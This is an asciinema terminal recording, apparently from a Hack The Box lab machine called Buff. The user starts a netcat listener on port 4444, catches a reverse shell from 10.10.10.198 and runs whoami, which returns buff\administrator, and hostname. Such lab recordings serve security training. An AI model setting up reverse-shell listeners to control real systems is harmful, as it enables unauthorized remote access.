{"version": 2, "width": 211, "height": 26, "timestamp": 1596009571, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.048769, "o", "\u001b[1m\u001b[3m\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                                                                                  \r \r\u001bk/home/prashant\u001b\\"]
[0.052628, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[0.05266, "o", "\u001b[?1h\u001b="]
[0.052758, "o", "\u001b[?2004h"]
[0.602062, "o", "\u001b[13Drlwrap nc -nlvp 4444"]
[1.358329, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n"]
[1.358735, "o", "\u001bkrlwrap\u001b\\"]
[1.361167, "o", "Ncat: Version 7.80 ( https://nmap.org/ncat )\r\r\nNcat: Listening on :::4444\r\r\nNcat: Listening on 0.0.0.0:4444\r\r\n"]
[1.421236, "o", "\r\r\u001b[K\r"]
[5.711228, "o", "Ncat: Connection from 10.10.10.198.\r\r\nNcat: Connection from 10.10.10.198:49996.\r\r\n"]
[5.753327, "o", "\r\r\u001b[K\r"]
[5.782231, "o", "Microsoft Windows [Version 10.0.17134.1610]"]
[5.823897, "o", "\r\r\u001b[K\rMicrosoft Windows [Version 10.0.17134.1610]"]
[6.343063, "o", "\r\r\u001b[K\rMicrosoft Windows [Version 10.0.17134.1610]\r\r\r\n(c) 2018 Microsoft Corporation. All rights reserved.\r\r\r\n\r\r\r\nC:\\Windows\\system32>"]
[6.384506, "o", "\r\r\u001b[K\rC:\\Windows\\system32>"]
[8.218326, "o", "\r\r\u001b[K\r"]
[8.218464, "o", "C:\\Windows\\system32>w"]
[8.426668, "o", "h"]
[8.642283, "o", "o"]
[8.882896, "o", "a"]
[8.986411, "o", "m"]
[9.178642, "o", "i"]
[9.45936, "o", "\b\b\b\b\b\b\u001b[K"]
[9.460437, "o", "whoami\r\r\n"]
[9.504817, "o", "\r\r\u001b[K\r"]
[9.865283, "o", "whoami\r\r\n"]
[9.916243, "o", "\r\r\u001b[K\r"]
[10.505457, "o", "buff\\administrator\r\r\r\n\r\r\r\nC:\\Windows\\system32>"]
[10.552406, "o", "\r\r\u001b[K\rC:\\Windows\\system32>"]
[11.412603, "o", "\r\r\u001b[K\r"]
[11.412658, "o", "C:\\Windows\\system32>h"]
[11.63604, "o", "o"]
[11.820266, "o", "s"]
[12.00443, "o", "t"]
[12.292811, "o", "n"]
[12.413138, "o", "a"]
[12.532632, "o", "m"]
[12.652816, "o", "e"]
[13.036983, "o", "\b\b\b\b\b\b\b\b\u001b[K"]
[13.039215, "o", "hostname\r\r\n"]
[13.092248, "o", "\r\r\u001b[K\r"]
[13.392272, "o", "hostname\r\r\n"]
[13.441645, "o", "\r\r\u001b[K\r"]
[13.707901, "o", "BUFF\r\r\r\n\r\r\r\nC:\\Windows\\system32>"]
[13.755883, "o", "\r\r\u001b[K\rC:\\Windows\\system32>"]
[15.246456, "o", "\r\r\u001b[K\rC:\\Windows\\system32>"]
[15.638981, "o", "\r\n"]
[15.639202, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                                                                                  \r \r"]
[15.639287, "o", "\u001bk/home/prashant\u001b\\"]
[15.642961, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[15.642991, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[16.287448, "o", "\u001b[?2004l\r\r\n"]
[16.288505, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                                                                                  \r \r"]
[16.28858, "o", "\u001bk/home/prashant\u001b\\"]
[16.292185, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[16.292215, "o", "\u001b[?1h\u001b="]
[16.29231, "o", "\u001b[?2004h"]
[16.82336, "o", "\u001b[?2004l\r\r\n"]
